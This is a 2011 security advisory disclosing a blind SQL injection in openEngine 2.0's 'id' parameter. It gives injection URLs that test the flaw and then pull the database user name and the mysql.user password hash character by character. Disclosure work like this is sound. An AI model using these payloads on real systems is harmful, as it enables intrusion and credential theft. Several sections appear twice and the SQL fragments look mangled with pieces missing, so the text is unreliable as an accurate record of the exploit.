SSCHADV2011-019 - openEngine 2.0 'id' Blind SQL Injection vulnerability
Advisory: |
openEngine 2.0 ‘id’ Blind SQL Injection vulnerability
|
Advisory ID: | SSCHADV2011-019 |
Author: |
Stefan Schurtz
|
Affected Software: | Successfully tested on openEngine 2.0 100226 |
Vendor URL: | |
Vendor Status: | informed |
CVE-ID: | - |
======================
Vulnerability Description:
======================
openEngine 2.0 is prone to a Blind SQL Injection
Vulnerability Description:
======================
openEngine 2.0 is prone to a Blind SQL Injection
==============
Technical Details:
==============
Database information
User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)
Blind SQL Injection
Technical Details:
==============
Database information
User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)
Blind SQL Injection
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND 1=1 AND (‘a’=‘a&key= <- error
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND 1=0 AND (‘a’=‘a&key= <- no error |
User-Guessing
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND (‘a’=‘a <- error (e)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND (‘a’=‘a <- error (a)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND (‘a’=‘a <- error (s)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND (‘a’=‘a <- error (y)
|
Password(Hash)-Guessing
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND ORD,CHAR)) FROM mysql.user WHERE user=CHAR LIMIT 0,1),1,1)) = 42 AND (‘a’=‘a <- error (*)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND ORD,CHAR)) FROM mysql.user WHERE user=CHAR LIMIT 0,1),2,1)) = 69 AND (‘a’=‘a <- error (E)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm’) AND ORD,CHAR)) FROM mysql.user WHERE user=CHAR LIMIT 0,1),3,1)) = 56 AND (‘a’=‘a <- error (8)
|
… and so on
=====
Solution:
=====
-
================
Disclosure Timeline:
================
25-Sep-2011 – informed developers
=====
Solution:
=====
-
================
Disclosure Timeline:
================
25-Sep-2011 – informed developers
26-Sep-2011 – release date of this security advisory
27-Sep-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.openengine.de/
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.openengine.de/
Comments
Display comments as Linear | Threaded